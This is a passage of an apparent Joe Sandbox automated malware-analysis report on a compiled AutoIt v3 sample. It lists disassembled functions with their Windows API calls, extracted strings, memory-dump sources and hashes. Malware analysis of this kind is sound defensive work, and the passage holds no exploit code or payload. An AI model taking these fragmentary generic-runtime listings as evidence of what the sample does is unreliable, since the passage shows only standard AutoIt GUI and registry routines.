                                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00A42955
                                                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00A42964
                                                                      • GetStockObject.GDI32(00000011), ref: 00A42974
                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00A42978
                                                                      • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00A42988
                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A42991
                                                                      • DeleteDC.GDI32(00000000), ref: 00A4299A
                                                                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00A429C6
                                                                      • SendMessageW.USER32(00000030,00000000,00000001), ref: 00A429DD
                                                                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00A42A1D
                                                                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00A42A31
                                                                      • SendMessageW.USER32(00000404,00000001,00000000), ref: 00A42A42
                                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00A42A77
                                                                      • GetStockObject.GDI32(00000011), ref: 00A42A82
                                                                      • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00A42A8D
                                                                      • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00A42A97
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                      • API String ID: 2910397461-517079104
                                                                      • Opcode ID: 3ee20290ada6052db1bc47e0a8618cb937a80f5fbe14941ef10a23ca21ee3bbd
                                                                      • Instruction ID: e8cfb4680a1229ee93055fce825cbf2a8ff02b0add93ac92d1c380e27851101a
                                                                      • Opcode Fuzzy Hash: 3ee20290ada6052db1bc47e0a8618cb937a80f5fbe14941ef10a23ca21ee3bbd
                                                                      • Instruction Fuzzy Hash: BDB15B75A00205AFEB14DFA8CC8AFAE7BB9FB48711F004519F915EB290DB70AD41CB90
                                                                      Function 00A34ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(00000001), ref: 00A34AED
                                                                      • GetDriveTypeW.KERNEL32(?,00A5CB68,?,\\.\,00A5CC08), ref: 00A34BCA
                                                                      • SetErrorMode.KERNEL32(00000000,00A5CB68,?,\\.\,00A5CC08), ref: 00A34D36
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$DriveType
                                                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                      • API String ID: 2907320926-4222207086
                                                                      • Opcode ID: 2c0ef5d97c7c485d877e61c0110ce6a379e78c89abaabbf39542902878d1fa0d
                                                                      • Instruction ID: 7d76c03db2c4d06e93d58fcf251c0d02d3db15193a2f74c894573021065763ce
                                                                      • Opcode Fuzzy Hash: 2c0ef5d97c7c485d877e61c0110ce6a379e78c89abaabbf39542902878d1fa0d
                                                                      • Instruction Fuzzy Hash: 6C619230605605AFDB04EF24CA82E6DB7B0FB4C744F24941AF806AB692DB35FD41DB42
                                                                      Function 00A573E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSysColor.USER32(00000012), ref: 00A57421
                                                                      • SetTextColor.GDI32(?,?), ref: 00A57425
                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00A5743B
                                                                      • GetSysColor.USER32(0000000F), ref: 00A57446
                                                                      • CreateSolidBrush.GDI32(?), ref: 00A5744B
                                                                      • GetSysColor.USER32(00000011), ref: 00A57463
                                                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00A57471
                                                                      • SelectObject.GDI32(?,00000000), ref: 00A57482
                                                                      • SetBkColor.GDI32(?,00000000), ref: 00A5748B
                                                                      • SelectObject.GDI32(?,?), ref: 00A57498
                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00A574B7
                                                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00A574CE
                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00A574DB
                                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00A5752A
                                                                      • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00A57554
                                                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 00A57572
                                                                      • DrawFocusRect.USER32(?,?), ref: 00A5757D
                                                                      • GetSysColor.USER32(00000011), ref: 00A5758E
                                                                      • SetTextColor.GDI32(?,00000000), ref: 00A57596
                                                                      • DrawTextW.USER32(?,00A570F5,000000FF,?,00000000), ref: 00A575A8
                                                                      • SelectObject.GDI32(?,?), ref: 00A575BF
                                                                      • DeleteObject.GDI32(?), ref: 00A575CA
                                                                      • SelectObject.GDI32(?,?), ref: 00A575D0
                                                                      • DeleteObject.GDI32(?), ref: 00A575D5
                                                                      • SetTextColor.GDI32(?,?), ref: 00A575DB
                                                                      • SetBkColor.GDI32(?,?), ref: 00A575E5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                      • String ID:
                                                                      • API String ID: 1996641542-0
                                                                      • Opcode ID: 0380021bb5b4374c410481054ac3fbf5f6a7134b407813f17d1c28a48c65e80b
                                                                      • Instruction ID: 78bcebc3ea515af67573435e0c1e8359ba88a6513c5a077e71ef4c5af5ee2aeb
                                                                      • Opcode Fuzzy Hash: 0380021bb5b4374c410481054ac3fbf5f6a7134b407813f17d1c28a48c65e80b
                                                                      • Instruction Fuzzy Hash: 54614A72900318AFDB01DFA4DC49EAEBFB9FB08322F114215F915BB2A1E7749941CB90
                                                                      Function 00A50FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetCursorPos.USER32(?), ref: 00A51128
                                                                      • GetDesktopWindow.USER32 ref: 00A5113D
                                                                      • GetWindowRect.USER32(00000000), ref: 00A51144
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00A51199
                                                                      • DestroyWindow.USER32(?), ref: 00A511B9
                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00A511ED
                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A5120B
                                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00A5121D
                                                                      • SendMessageW.USER32(00000000,00000421,?,?), ref: 00A51232
                                                                      • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00A51245
                                                                      • IsWindowVisible.USER32(00000000), ref: 00A512A1
                                                                      • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00A512BC
                                                                      • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00A512D0
                                                                      • GetWindowRect.USER32(00000000,?), ref: 00A512E8
                                                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 00A5130E
                                                                      • GetMonitorInfoW.USER32(00000000,?), ref: 00A51328
                                                                      • CopyRect.USER32(?,?), ref: 00A5133F
                                                                      • SendMessageW.USER32(00000000,00000412,00000000), ref: 00A513AA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                      • String ID: ($0$tooltips_class32
                                                                      • API String ID: 698492251-4156429822
                                                                      • Opcode ID: 827fb15b7761319300aae94e066ad6333214c79c87ad6d3efebe166ed09480b9
                                                                      • Instruction ID: 644917cedddceb0203ef1fb40fe0f604533814ad54cf3a6ede6a396c42ed5e71
                                                                      • Opcode Fuzzy Hash: 827fb15b7761319300aae94e066ad6333214c79c87ad6d3efebe166ed09480b9
                                                                      • Instruction Fuzzy Hash: 5FB17A71604341AFD700DF64C885F6ABBE4FF88755F00891CF9999B2A1D771E849CB92
                                                                      Function 00A50241 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CharUpperBuffW.USER32(?,?), ref: 00A502E5
                                                                      • _wcslen.LIBCMT ref: 00A5031F
                                                                      • _wcslen.LIBCMT ref: 00A50389
                                                                      • _wcslen.LIBCMT ref: 00A503F1
                                                                      • _wcslen.LIBCMT ref: 00A50475
                                                                      • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00A504C5
                                                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00A50504
                                                                        • Part of subcall function 009DF9F2: _wcslen.LIBCMT ref: 009DF9FD
                                                                        • Part of subcall function 00A2223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00A22258
                                                                        • Part of subcall function 00A2223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00A2228A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                      • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                      • API String ID: 1103490817-719923060
                                                                      • Opcode ID: 074e9679ac8a9daf0cbc94ee205ebf57b1232a3cbc05cd30ce1ba715f8a1eda3
                                                                      • Instruction ID: 6c3578b3066925b4e9e4f8b85ab08b1b9ce1fc708dd5110989c98414dcc67fbf
                                                                      • Opcode Fuzzy Hash: 074e9679ac8a9daf0cbc94ee205ebf57b1232a3cbc05cd30ce1ba715f8a1eda3
                                                                      • Instruction Fuzzy Hash: 66E19A316082019FC714EF24C551E2EB7E6BFD8315B14896DF896AB3A1DB30ED49CB82
                                                                      Function 009D8891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 009D8968
                                                                      • GetSystemMetrics.USER32(00000007), ref: 009D8970
                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 009D899B
                                                                      • GetSystemMetrics.USER32(00000008), ref: 009D89A3
                                                                      • GetSystemMetrics.USER32(00000004), ref: 009D89C8
                                                                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 009D89E5
                                                                      • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 009D89F5
                                                                      • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 009D8A28
                                                                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 009D8A3C
                                                                      • GetClientRect.USER32(00000000,000000FF), ref: 009D8A5A
                                                                      • GetStockObject.GDI32(00000011), ref: 009D8A76
                                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 009D8A81
                                                                        • Part of subcall function 009D912D: GetCursorPos.USER32(?), ref: 009D9141
                                                                        • Part of subcall function 009D912D: ScreenToClient.USER32(00000000,?), ref: 009D915E
                                                                        • Part of subcall function 009D912D: GetAsyncKeyState.USER32(00000001), ref: 009D9183
                                                                        • Part of subcall function 009D912D: GetAsyncKeyState.USER32(00000002), ref: 009D919D
                                                                      • SetTimer.USER32(00000000,00000000,00000028,009D90FC), ref: 009D8AA8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                      • String ID: AutoIt v3 GUI
                                                                      • API String ID: 1458621304-248962490
                                                                      • Opcode ID: 3b389d16d6b3a5affb7e0f86a96cafd3d3874f17e7813e8d8b04b0d12b70c488
                                                                      • Instruction ID: 2412d4bd56085cd9fad7bc668291f9191e7e4d4dafca4b9442ed66317f61ae11
                                                                      • Opcode Fuzzy Hash: 3b389d16d6b3a5affb7e0f86a96cafd3d3874f17e7813e8d8b04b0d12b70c488
                                                                      • Instruction Fuzzy Hash: 0AB16D75A4030A9FDB14DFA8CC95BEE3BB5FB48315F10822AFA15E7290DB34A941CB51
                                                                      Function 00A20D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00A210F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00A21114
                                                                        • Part of subcall function 00A210F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00A20B9B,?,?,?), ref: 00A21120
                                                                        • Part of subcall function 00A210F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00A20B9B,?,?,?), ref: 00A2112F
                                                                        • Part of subcall function 00A210F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00A20B9B,?,?,?), ref: 00A21136
                                                                        • Part of subcall function 00A210F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00A2114D
                                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00A20DF5
                                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00A20E29
                                                                      • GetLengthSid.ADVAPI32(?), ref: 00A20E40
                                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00A20E7A
                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00A20E96
                                                                      • GetLengthSid.ADVAPI32(?), ref: 00A20EAD
                                                                      • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00A20EB5
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00A20EBC
                                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00A20EDD
                                                                      • CopySid.ADVAPI32(00000000), ref: 00A20EE4
                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00A20F13
                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00A20F35
                                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00A20F47
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A20F6E
                                                                      • HeapFree.KERNEL32(00000000), ref: 00A20F75
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A20F7E
                                                                      • HeapFree.KERNEL32(00000000), ref: 00A20F85
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A20F8E
                                                                      • HeapFree.KERNEL32(00000000), ref: 00A20F95
                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00A20FA1
                                                                      • HeapFree.KERNEL32(00000000), ref: 00A20FA8
                                                                        • Part of subcall function 00A21193: GetProcessHeap.KERNEL32(00000008,00A20BB1,?,00000000,?,00A20BB1,?), ref: 00A211A1
                                                                        • Part of subcall function 00A21193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00A20BB1,?), ref: 00A211A8
                                                                        • Part of subcall function 00A21193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00A20BB1,?), ref: 00A211B7
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                      • String ID:
                                                                      • API String ID: 4175595110-0
                                                                      • Opcode ID: 88e518ae62be6c3105aa111d863bb82ebc307244893df50daf8ac814c0bc20c3
                                                                      • Instruction ID: 6b3d2acec63cbba19e138f7458f9e61bfd1f8269febf8deb4106329986c1c7ab
                                                                      • Opcode Fuzzy Hash: 88e518ae62be6c3105aa111d863bb82ebc307244893df50daf8ac814c0bc20c3
                                                                      • Instruction Fuzzy Hash: 4C714A7290032AAFDF20DFA8ED44FAEBBB8FF04311F144125E919E6192D7719905CB60
                                                                      Function 00A4C3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A4C4BD
                                                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,00A5CC08,00000000,?,00000000,?,?), ref: 00A4C544
                                                                      • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00A4C5A4
                                                                      • _wcslen.LIBCMT ref: 00A4C5F4
                                                                      • _wcslen.LIBCMT ref: 00A4C66F
                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00A4C6B2
                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00A4C7C1
                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00A4C84D
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00A4C881
                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00A4C88E
                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00A4C960
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                      • API String ID: 9721498-966354055
                                                                      • Opcode ID: 84df86b94b29b21aca55e4e633e1242678792e9f6b77bf1e9f54dcd7fa87fa9b
                                                                      • Instruction ID: 1ce1630fde55d646763f2d78105039030341f46511ca7d62055e590f0b7f8938
                                                                      • Opcode Fuzzy Hash: 84df86b94b29b21aca55e4e633e1242678792e9f6b77bf1e9f54dcd7fa87fa9b
                                                                      • Instruction Fuzzy Hash: 0D1225756042019FD754DF24C891F2AB7E5EF88724F14889DF88A9B2A2DB31ED41CB86
                                                                      Function 00A5091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CharUpperBuffW.USER32(?,?), ref: 00A509C6
                                                                      • _wcslen.LIBCMT ref: 00A50A01
                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00A50A54
                                                                      • _wcslen.LIBCMT ref: 00A50A8A
                                                                      • _wcslen.LIBCMT ref: 00A50B06
                                                                      • _wcslen.LIBCMT ref: 00A50B81
                                                                        • Part of subcall function 009DF9F2: _wcslen.LIBCMT ref: 009DF9FD
                                                                        • Part of subcall function 00A22BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00A22BFA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                      • API String ID: 1103490817-4258414348
                                                                      • Opcode ID: 92e7a40f9ffb91c6a1853f6a845124017625150860b313a7ba861d98c07363ab
                                                                      • Instruction ID: 8f28ad8852a10f534b199eff2941f5e2d7b9fd53dd699ba18fbabcd90ff1e1e7
                                                                      • Opcode Fuzzy Hash: 92e7a40f9ffb91c6a1853f6a845124017625150860b313a7ba861d98c07363ab
                                                                      • Instruction Fuzzy Hash: 9FE18B326087019FCB14EF24C490E2AB7E2BFD8355B15895DF8969B362D730ED49CB82
                                                                      Function 00A4C998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$BuffCharUpper
                                                                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                      • API String ID: 1256254125-909552448
                                                                      • Opcode ID: 818b5e59ffda9bfa50b359b822f0ae3b8eb8849cba4e2f7f187787a9fe4e7208
                                                                      • Instruction ID: 3bb71bca32dccb5d28c102bdac17b7014bbda67eea194a52e296b2c7cbfe0291
                                                                      • Opcode Fuzzy Hash: 818b5e59ffda9bfa50b359b822f0ae3b8eb8849cba4e2f7f187787a9fe4e7208
                                                                      • Instruction Fuzzy Hash: 7071F83660116A8BCB50DF78CD516BE33A2AFE07B4B254528F85AA7285EA31CD45C790
                                                                      Function 00A5833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _wcslen.LIBCMT ref: 00A5835A
                                                                      • _wcslen.LIBCMT ref: 00A5836E
